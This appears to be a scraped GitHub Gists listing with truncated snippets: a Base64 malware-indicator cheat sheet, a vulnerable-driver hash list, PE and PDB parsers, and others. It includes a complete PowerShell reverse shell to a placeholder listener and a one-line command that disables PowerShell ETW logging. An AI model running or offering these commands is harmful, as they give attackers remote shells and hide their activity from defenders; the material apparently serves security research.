| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
JAB |
π£ Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
πΊ Television | MZ |
MZ header |
SUVY |
π SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
π£ Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
π£ Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
πͺ "Pah!" | <. |
Often used by Emotet (UTF-16) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them were taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 4 columns, instead of 2 in line 8.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SHA256,Name,Signer,Description | |
| 04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """, | |
| 05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows | |
| 4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows | |
| 6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows | |
| 8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows | |
| B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows | |
| 7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO | |
| 7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys |
MircoBabin
/ ReadingPortableExecutable_PE_header.cs
Last active
June 3, 2021 13:02
— forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C# - reading Import Directory Table to e.g. determine Microsoft VC Runtime version
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace peheader | |
| { | |
| //https://gist.github.com/caioproiete/b51f29f74f5f5b2c59c39e47a8afc3a3 |
rasta-mouse
/ PPID Spoof & BlockDLLs
Last active
April 1, 2025 22:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
Neo23x0
/ Base64_CheatSheet.md
Last active
December 1, 2025 19:51
Learning Aid - Top Base64 Encodings Table
nathan130200
/ MessageBox.cs
Created
July 14, 2019 18:39
C# user32.dll MessageBox Raw implementation without System.Windows.Forms (based on https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messagebox)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| namespace User32 | |
| { | |
| public static class MessageBox | |
| { | |
| [DllImport("user32.dll")] | |
| static extern int MessageBoxA(IntPtr hWnd, | |
| string lpText, | |
| string lpCaption, | |
| uint uType); |
namazso
/ pdb_parser_lite.cpp
Created
April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* MIT License | |
| * | |
| * Copyright (c) namazso 2018 | |
| * | |
| * Permission is hereby granted, free of charge, to any person obtaining a copy | |
| * of this software and associated documentation files (the "Software"), to deal | |
| * in the Software without restriction, including without limitation the rights | |
| * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| * copies of the Software, and to permit persons to whom the Software is | |
| * furnished to do so, subject to the following conditions: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
tandasat
/ KillETW.ps1
Last active
August 22, 2025 06:28
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var net = require('net') | |
| var readline = require('readline') | |
| /** | |
| * @class Client | |
| * @param host {String} the host | |
| * @param post {Integer} the port | |
| */ | |
| function Client (host, port) { | |
| this.host = host |
NewerOlder